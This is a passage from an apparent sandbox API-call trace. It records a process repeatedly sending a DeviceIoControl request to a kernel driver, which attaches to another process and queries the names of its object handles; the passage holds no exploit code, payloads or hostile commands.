Object=0xfffff8a000c69080, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.488] ObfDereferenceObject (Object=0xfffff8a000c69080) returned 0x3 [0223.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.488] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.488] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.488] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.488] PsAcquireProcessExitSynchronization () returned 0x0 [0223.488] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.488] ObReferenceObjectByHandle (in: Handle=0x40c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038e3960, HandleInformation=0x0) returned 0x0 [0223.488] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.488] PsReleaseProcessExitSynchronization () returned 0x2 [0223.488] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.488] ObQueryNameString (in: Object=0xfffffa80038e3960, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.488] ObfDereferenceObject (Object=0xfffffa80038e3960) returned 0x1 [0223.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.489] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.489] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.489] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3c, lpOverlapped=0x0) returned 1 [0223.489] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.489] PsAcquireProcessExitSynchronization () returned 0x0 [0223.489] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.489] ObReferenceObjectByHandle (in: Handle=0x440, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a9d5f0, HandleInformation=0x0) returned 0x0 [0223.489] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.489] PsReleaseProcessExitSynchronization () returned 0x2 [0223.489] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.489] ObQueryNameString (in: Object=0xfffffa8003a9d5f0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.489] ObfDereferenceObject (Object=0xfffffa8003a9d5f0) returned 0x2 [0223.489] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.489] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.489] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.489] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd0, lpOverlapped=0x0) returned 1 [0223.489] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.489] PsAcquireProcessExitSynchronization () returned 0x0 [0223.490] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.490] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8010bbbf20, HandleInformation=0x0) returned 0x0 [0223.490] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.490] PsReleaseProcessExitSynchronization () returned 0x2 [0223.490] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.490] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.490] ObfDereferenceObject (Object=0xfffffa8010bbbf20) returned 0x6 [0223.490] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.490] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.490] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.490] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0223.490] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.490] PsAcquireProcessExitSynchronization () returned 0x0 [0223.490] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.490] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003883280, HandleInformation=0x0) returned 0x0 [0223.490] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.490] PsReleaseProcessExitSynchronization () returned 0x2 [0223.490] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.490] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.490] ObfDereferenceObject (Object=0xfffffa8003883280) returned 0x12 [0223.490] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.491] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.491] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.491] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0223.491] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.491] PsAcquireProcessExitSynchronization () returned 0x0 [0223.491] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.491] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036be3d0, HandleInformation=0x0) returned 0x0 [0223.491] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.491] PsReleaseProcessExitSynchronization () returned 0x2 [0223.491] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.491] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.491] ObfDereferenceObject (Object=0xfffffa80036be3d0) returned 0x12 [0223.491] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.491] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.491] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.491] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd4, lpOverlapped=0x0) returned 1 [0223.491] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.491] PsAcquireProcessExitSynchronization () returned 0x0 [0223.491] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.491] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034a5070, HandleInformation=0x0) returned 0x0 [0223.491] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.492] PsReleaseProcessExitSynchronization () returned 0x2 [0223.492] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.492] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.492] ObfDereferenceObject (Object=0xfffffa80034a5070) returned 0x13 [0223.492] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.492] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.492] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xca, lpOverlapped=0x0) returned 1 [0223.492] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.492] PsAcquireProcessExitSynchronization () returned 0x0 [0223.492] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.492] ObReferenceObjectByHandle (in: Handle=0x4b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036fa740, HandleInformation=0x0) returned 0x0 [0223.492] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.492] PsReleaseProcessExitSynchronization () returned 0x2 [0223.492] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.492] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.492] ObfDereferenceObject (Object=0xfffffa80036fa740) returned 0x21 [0223.492] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.492] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.492] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0223.492] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.492] PsAcquireProcessExitSynchronization () returned 0x0 [0223.493] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.493] ObReferenceObjectByHandle (in: Handle=0x4b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036fa490, HandleInformation=0x0) returned 0x0 [0223.493] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.493] PsReleaseProcessExitSynchronization () returned 0x2 [0223.493] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.493] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.493] ObfDereferenceObject (Object=0xfffffa80036fa490) returned 0x12 [0223.493] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.493] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.493] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.493] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0223.493] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.493] PsAcquireProcessExitSynchronization () returned 0x0 [0223.493] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.493] ObReferenceObjectByHandle (in: Handle=0x4c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037072c0, HandleInformation=0x0) returned 0x0 [0223.493] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.493] PsReleaseProcessExitSynchronization () returned 0x2 [0223.493] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.493] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.493] ObfDereferenceObject (Object=0xfffffa80037072c0) returned 0x12 [0223.494] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.494] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.494] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.494] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0223.494] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.494] PsAcquireProcessExitSynchronization () returned 0x0 [0223.494] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.494] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003734070, HandleInformation=0x0) returned 0x0 [0223.494] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.494] PsReleaseProcessExitSynchronization () returned 0x2 [0223.494] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.494] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.494] ObfDereferenceObject (Object=0xfffffa8003734070) returned 0x13 [0223.494] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.494] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.494] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.494] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0223.494] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.494] PsAcquireProcessExitSynchronization () returned 0x0 [0223.494] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.494] ObReferenceObjectByHandle (in: Handle=0x4e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036bb750, HandleInformation=0x0) returned 0x0 [0223.494] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.494] PsReleaseProcessExitSynchronization () returned 0x2 [0223.495] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.495] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.495] ObfDereferenceObject (Object=0xfffffa80036bb750) returned 0x12 [0223.495] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.495] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.495] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.495] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x104, lpOverlapped=0x0) returned 1 [0223.495] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.495] PsAcquireProcessExitSynchronization () returned 0x0 [0223.495] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.495] ObReferenceObjectByHandle (in: Handle=0x4ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036bb4b0, HandleInformation=0x0) returned 0x0 [0223.495] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.495] PsReleaseProcessExitSynchronization () returned 0x2 [0223.495] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.495] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.495] ObfDereferenceObject (Object=0xfffffa80036bb4b0) returned 0x13 [0223.495] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.495] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.495] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.495] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xda, lpOverlapped=0x0) returned 1 [0223.495] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.495] PsAcquireProcessExitSynchronization () returned 0x0 [0223.496] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.496] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003759750, HandleInformation=0x0) returned 0x0 [0223.496] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.496] PsReleaseProcessExitSynchronization () returned 0x2 [0223.496] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.496] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.496] ObfDereferenceObject (Object=0xfffffa8003759750) returned 0x12 [0223.496] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.496] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.496] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x104, lpOverlapped=0x0) returned 1 [0223.496] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.496] PsAcquireProcessExitSynchronization () returned 0x0 [0223.496] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.496] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034e05a0, HandleInformation=0x0) returned 0x0 [0223.496] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.496] PsReleaseProcessExitSynchronization () returned 0x2 [0223.496] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.496] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.497] ObfDereferenceObject (Object=0xfffffa80034e05a0) returned 0x20 [0223.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.497] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.497] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc4, lpOverlapped=0x0) returned 1 [0223.497] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.497] PsAcquireProcessExitSynchronization () returned 0x0 [0223.497] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.497] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034dd3d0, HandleInformation=0x0) returned 0x0 [0223.497] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.497] PsReleaseProcessExitSynchronization () returned 0x2 [0223.497] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.497] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.497] ObfDereferenceObject (Object=0xfffffa80034dd3d0) returned 0x12 [0223.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.497] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, 